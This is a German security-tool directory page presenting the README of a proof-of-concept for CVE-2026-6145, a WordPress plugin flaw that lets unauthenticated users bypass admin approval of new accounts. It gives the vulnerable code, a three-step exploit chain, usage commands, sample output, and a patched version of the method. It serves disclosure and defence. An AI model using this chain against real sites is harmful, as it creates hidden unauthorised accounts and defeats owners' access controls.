Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6145 — Benutzerregistrierung & Mitgliedschaft <= 5.1.5 - Nicht authentifizierte fehlende Autorisierung zur Umgehung der Administratorgenehmigung über den Parameter 'action' | Kitploit
Tools/GitHubGitHub/hann1bl3l3ct3r/cve-2026-6145
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubhann1bl3l3ct3r/cve-2026-6145

CVE-2026-6145

Benutzerregistrierung & Mitgliedschaft <= 5.1.5 - Nicht authentifizierte fehlende Autorisierung zur Umgehung der Administratorgenehmigung über den Parameter 'action'

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-6145 — User Registration & Membership for WordPress: Unauthenticated Admin Approval Bypass

Proof-of-concept-Exploit für CVE-2026-6145, eine Fehlstelle in der Autorisierung des Plugins User Registration & Membership für WordPress (≤ 5.1.5), die es nicht authentifizierten Angreifern ermöglicht, die Admin-Freigabe bei der Erstellung neuer Benutzerkonten zu umgehen.

CVE CVSS CWE License


Zusammenfassung

CVE-IDCVE-2026-6145
CNAWordfence
SchwachstelleFehlende Autorisierung – Umgehung der Admin-Freigabe
CWECWE-862 (Fehlende Autorisierung)
CVSS 3.15.3 Mittel (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
BetroffenUser Registration & Membership für WordPress – alle Versionen ≤ 5.1.5
BehobenVersion > 5.1.5
ForscherAnthony Cihan – Offensive Security Lead, Obviam
OffenlegungWordfence Responsible Disclosure Program
Veröffentlicht2026-05-14

Schwachstellendetails

Grundursache

Die Methode is_admin_creation_process() in includes/class-ur-user-approval.php ist die einzige Instanz, die bestimmt, ob eine neue Registrierung als vom Administrator initiierte Erstellung behandelt werden soll. Wenn diese Methode true zurückgibt, treten zwei Nebeneffekte auf:

  • set_user_status() setzt den Status des neuen Benutzers auf APPROVED und überspringt damit die Warteschlange für ausstehende Genehmigungen.
  • send_request_notification_to_admin() unterdrückt die Administrator-Benachrichtigungs-E-Mail für die neue Registrierung.

Die Methode selbst enthält in Version 5.1.5 keinerlei Authentifizierung, Autorisierung oder Nonce-Überprüfung:

root@kitploit:~
// includes/class-ur-user-approval.php:459-461
protected function is_admin_creation_process() {
    return ( isset( $_REQUEST['action'] ) && 'createuser' == $_REQUEST['action'] );
}

Da $_REQUEST $_GET, $_POST und $_COOKIE zusammenführt, kann ein nicht authentifizierter Angreifer diesen Check erfüllen, indem er ?action=createuser an die URL einer Registrierungsformular-Übermittlung anhängt. Das Plugin genehmigt dann das Konto automatisch und benachrichtigt den Administrator nie.

Ausnutzungskette

Während sich CVE-2026-6145 speziell auf die fehlende Autorisierung in is_admin_creation_process() bezieht, erfordert eine vollständige nicht authentifizierte Ausnutzung gegen ein abgesichertes Registrierungsformular die Verkettung mit zwei zusätzlichen Problemen in derselben Plugin-Version, die der beigefügte PoC automatisch behandelt:

Das Ergebnis: Ein vollständig genehmigtes Benutzerkonto, erstellt ohne Administrator-Interaktion oder -Benachrichtigung, auf einer Seite, die explizit eine Admin-Freigabe für neue Registrierungen verlangt.


Nachweis des Konzepts

Anforderungen

  • Python 3.8+
  • Bibliothek requests
  • Ein Testziel mit User Registration & Membership ≤ 5.1.5 mit:
    • Aktivierter Registrierung
    • Aktivierter Admin-Freigabe-Login-Option
    • Einer bekannten Formular-ID (im Quelltext der Seite als data-form-id sichtbar)

Installation

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2026-6145.git
cd CVE-2026-6145
pip install requests

Verwendung

root@kitploit:~
python3 poc_admin_approval_bypass.py <target_url> <form_id>

Beispiel:

root@kitploit:~
python3 poc_admin_approval_bypass.py http://wp.example.lab 7

Erwartete Ausgabe

root@kitploit:~
======================================================================
  User Registration v5.1.4 - Admin Approval Bypass PoC
  CVE: 2026-6145 | CWE-862
  Affects: User Registration & Membership <= 5.1.5
======================================================================

[*] Target:  http://wp.example.lab
[*] Form ID: 7

[*] STEP 1: Obtaining nonce via unauthenticated AJAX endpoint
[+] SUCCESS: Got valid nonce for form 7: a1b2c3d4e5

[*] STEP 2: Registering user with admin approval bypass
    Username: poc_bypass_1747249200
    Email:    [email protected]
[+] Registration request processed (HTTP 200)

[*] STEP 3: Verifying user was created
[+] CONFIRMED: User 'poc_bypass_1747249200' exists in the database

======================================================================
  RESULTS
======================================================================
  Unauthenticated Nonce Generation:  CONFIRMED
  AJAX Nonce Bypass:                  CONFIRMED
  Admin Approval Bypass (CVE-...):    CONFIRMED

  [!] User was created with AUTO-APPROVED status
  [!] Admin was NOT notified of this registration
======================================================================

Überprüfung

Nach dem Ausführen des PoCs melden Sie sich bei wp-admin an und prüfen Sie Users → All Users:

  • Das erstellte Konto erscheint mit dem Status Approved.
  • Ein Benutzer, der während desselben Zeitfensters über das normale Formular registriert wurde, bleibt Pending.
  • Das Administrator-Benachrichtigungspostfach enthält keine E-Mail für das umgangene Konto.

Auswirkungen

Auf WordPress-Seiten, die die Admin-Freigabe als primäre Hürde gegen unerwünschte Kontenerstellungen nutzen – üblich bei Mitgliederseiten, geschlossenen Communities, internen Portalen, B2B-Plattformen und jeder Seite, die vor dem Zugriff eine Identitätsprüfung erfordert – neutralisiert diese Schwachstelle diese Kontrolle stillschweigend. Zu den konkreten Konsequenzen gehören:

  • Umgehung von Zugriffskontrollen auf Geschäftsebene: Jegliche registrierungspflichtige Inhalte oder Funktionen (nur für Mitglieder zugängliche Seiten, eingeschränkte Foren, geschützte Downloads) werden ohne Administrator-Prüfung erreichbar.
  • Aushebelung von Betrugs- und Missbrauchsbekämpfung: Seiten, die die Admin-Freigabe nutzen, um Spam-, Fake- oder betrügerische Registrierungen auszufiltern, verlieren diesen Filter vollständig.
  • Heimliche Kontoerstellung: Da die Admin-Benachrichtigung ebenfalls unterdrückt wird, können die unbefugten Konten unerkannt bestehen bleiben, bis eine manuelle Benutzerprüfung durchgeführt wird.
  • Ansatzpunkt für weitere Angriffe: Ein genehmigtes Konto mit niedrigen Berechtigungen bietet einen Einstiegspunkt für anschließende Privilegieneskalation, Inhaltsmissbrauch oder die Ausnutzung anderer authentifizierungsabhängiger Schwachstellen derselben Seite.

Der CVSS-Score spiegelt nur die Auswirkungen auf die Integrität wider (kein direkter Verlust der Datenvertraulichkeit oder Dienstunterbrechung), aber die tatsächlichen Auswirkungen skalieren mit der Abhängigkeit der betroffenen Seite vom Genehmigungsworkflow als Sicherheitsgrenze.


Betroffene Versionen

VersionStatus
≤ 5.1.5Anfällig
> 5.1.5Beheben

Behebung

Für Website-Administratoren

  1. Sofort aktualisieren auf die neueste Version von User Registration & Membership (> 5.1.5).
  2. Überprüfen Sie Users → All Users auf unerwartete genehmigte Konten, die seit der Installation der anfälligen Version erstellt wurden. Achten Sie besonders auf Konten ohne entsprechende Admin-Benachrichtigungs-E-Mail.
  3. Setzen Sie Anmeldeinformationen zurück und überprüfen Sie die Aktivität aller verdächtigen identifizierten Konten.
  4. Falls eine sofortige Aktualisierung nicht möglich ist, deaktivieren Sie die öffentliche Registrierung in den WordPress-Einstellungen als temporäre Abhilfe.

Für Entwickler / Code-Referenz

Die anfällige Methode sollte sowohl eine Berechtigungsprüfung als auch eine gültige Nonce erfordern:

root@kitploit:~
protected function is_admin_creation_process() {
    return current_user_can( 'create_users' )
        && isset( $_REQUEST['action'] )
        && 'createuser' === $_REQUEST['action']
        && isset( $_REQUEST['_wpnonce_create-user'] )
        && wp_verify_nonce(
               wp_unslash( $_REQUEST['_wpnonce_create-user'] ),
               'create-user'
           );
}

Offenlegungszeitplan

DatumEreignis

Referenzen

  • Wordfence Advisory — CVE-2026-6145
  • NVD — CVE-2026-6145
  • CWE-862: Missing Authorization
  • WordPress Plugin Repository — User Registration & Membership

Verwandte Schwachstellen im selben Plugin

Forscher, die das Autorisierungsmodell dieses Plugins verfolgen, könnten auch an Folgendem interessiert sein:

  • CVE-2026-1492 — Unauthenticated Privilege Escalation (≤ 5.1.2)
  • CVE-2026-1779 — Authentication Bypass via register_member (≤ 5.1.2)
  • CVE-2026-4056 — Broken Access Control on Content Access Rules REST API (5.0.1 – 5.1.4)
  • CVE-2026-6203 — Unauthenticated Open Redirect (≤ 5.1.4)

Danksagungen

Forschung, Entdeckung und PoC-Entwicklung:

Anthony Cihan Offensive Security Lead — Obviam

Wenn Sie diese Arbeit zitieren, nennen Sie bitte CVE-2026-6145 mit Zuschreibung an Anthony Cihan / Obviam.


Rechtlicher und ethischer Hinweis

Dieser Proof-of-Concept wird ausschließlich für defensive Forschung, Erkennungsentwicklung und autorisierte Sicherheitstests veröffentlicht. Er soll unterstützen:

  • WordPress-Website-Administratoren bei der Überprüfung der Patch-Bereitstellung
  • Sicherheitsanbieter bei der Entwicklung von Erkennungssignaturen und WAF-Regeln
  • Forscher, die Autorisierungskontrollmuster in WordPress-Plugins untersuchen
  • Pädagogen und Studenten in Programmen für offensive und defensive Sicherheit

Die ursprüngliche Forschung wurde in einer autorisierten Laborumgebung unter einer unterzeichneten Vereinbarung durchgeführt, mit koordinierter Offenlegung gegenüber dem Anbieter über das Wordfence Responsible Disclosure Program vor der öffentlichen Veröffentlichung.

Das Ausführen dieses PoCs gegen ein System, das Sie nicht besitzen oder für das Sie keine ausdrückliche schriftliche Testgenehmigung haben, ist illegal gemäß dem U.S. Computer Fraud and Abuse Act (18 U.S.C. § 1030), dem U.K. Computer Misuse Act 1990, der E.U. Directive 2013/40/EU und gleichwertigen Gesetzen in den meisten Rechtsordnungen. Der Autor und Obviam lehnen jede Haftung für die missbräuchliche Verwendung dieses Codes ab.

Durch die Nutzung dieses Repositorys bestätigen Sie, dass Sie diese Bedingungen gelesen, verstanden und akzeptiert haben.


Lizenz

Veröffentlicht unter der MIT-Lizenz. Namensnennung gemäß obigem Danksagungsabschnitt erforderlich.

Tool herunterladen
SchrittProblemZweck
1Nicht authentifizierte Nonce-Generierung über den wp_ajax_nopriv-Endpunkt user_registration_get_recent_nonce (nur Referer-Prüfung)Erlangen einer gültigen ur_frontend_form_nonce ohne authentifizierte Sitzung
2Umgehung der AJAX-Nonce-Prüfung, wenn ur_fallback_submit im Formular-Handler nicht leer istÜbermittlung der Registrierung über den Fallback-Pfad ohne gültigen AJAX-Referer
3CVE-2026-6145 – action=createuser in $_REQUEST setzt is_admin_creation_process() auf trueAuto-Genehmigung des neuen Kontos und Unterdrückung der Admin-Benachrichtigung
2026-03-09Schwachstelle während eines autorisierten Sicherheitsaudits von Plugin v5.1.4 identifiziert
2026-03-09Erster Bericht an das Wordfence Responsible Disclosure Program übermittelt
2026-04-12CVE-2026-6145 von Wordfence (CNA) reserviert
2026-05-14Vom Anbieter veröffentlichte behobene Version; CVE-2026-6145 veröffentlicht
2026-05-14Dieser PoC in Abstimmung mit dem öffentlichen Advisory veröffentlicht